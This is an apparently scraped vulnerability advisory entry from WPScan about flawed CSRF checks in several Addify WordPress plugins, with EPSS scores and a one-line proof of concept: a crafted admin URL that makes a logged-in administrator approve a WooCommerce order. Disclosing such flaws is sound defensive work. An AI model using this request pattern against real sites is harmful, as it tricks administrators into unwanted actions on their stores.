Lucene search

K
wpvulndbWpvulndbWPVDB-ID:2C2379D0-E373-4587-A747-429D7EE8F6CC
HistoryJul 10, 2023 - 12:00 a.m.

Multiple Plugins from Addify - Multiple CSRF

2023-07-1000:00:00
wpscan.com
6
addify
csrf
plugins
security
attackers
user actions

EPSS

0.001

Percentile

30.5%

The plugins have flawed CSRF checks in various places, which could allow attackers to make logged in users perform unwanted actions

PoC

[addify-order-approval-woocommerce] - To make a logged in admin approve the order with ID 103 https://example.com/wp-admin/edit.php?s=&post;_status=all&post;_type=shop_order&action;=approved&m;=0&_customer_user=&paged;=1&post;[]=103&action2;=approved

EPSS

0.001

Percentile

30.5%

Related for WPVDB-ID:2C2379D0-E373-4587-A747-429D7EE8F6CC